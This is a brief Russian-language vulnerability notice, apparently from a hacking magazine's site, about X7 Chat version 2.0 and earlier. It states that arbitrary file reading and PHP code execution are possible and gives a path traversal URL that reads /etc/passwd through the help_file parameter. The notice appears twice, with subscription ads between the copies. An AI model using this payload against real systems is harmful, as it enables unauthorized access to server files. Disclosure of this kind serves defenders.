Программа: X7 Chat <=2.0
Нападающий может просмотреть произвольные файлы на системе или выполнить
произвольный PHP-код.
Пример:
http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd
Лучшие статьи квартала на бумаге
2 000 ₽
Заказать журнал
Полный доступ к статьям и архиву выпусков
6 000 ₽ в год
Подписаться
Совместный курс «Хакера» и лаборатории «Хаксет»
7 000 ₽
Купить курс
Лучшие статьи за 2021–2022 годы на бумаге
2 000 ₽
Заказать журналПрограмма: X7 Chat <=2.0
Нападающий может просмотреть произвольные файлы на системе или выполнить
произвольный PHP-код.
Пример:
http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd